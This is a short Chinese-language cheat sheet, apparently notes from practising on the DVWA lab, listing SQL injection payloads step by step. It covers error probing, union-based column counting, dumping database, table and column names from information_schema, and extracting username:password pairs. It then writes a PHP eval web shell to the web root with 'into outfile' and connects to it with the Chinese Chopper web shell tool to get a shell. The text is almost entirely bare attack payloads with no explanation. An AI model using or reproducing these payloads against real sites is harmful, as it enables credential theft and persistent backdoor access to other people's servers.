试报错
看回显
暴字段
order by 3
union select 1,2,3
暴库
1,2,database()
暴表
group_concat(table_name) from information_schema.tables where table_schema =database()
或
group_concat(table_name) from information_schema.tables where table_schema=‘security‘ --+
暴列
group_concat(column_name) from information_schema.columns where table_name=‘users‘ --+
查内容
group_concat(username,‘:‘,password)from security.users --+
确定root权限
user()
确定绝对路径
@@datadir
传马
1‘ union select 1,‘<?php @eval($_POST["pass"]);?>‘into outfile‘D:/phpstudy/PHPTutorial/WWW/DVWA/test.php‘ #
上菜刀连后台
getshell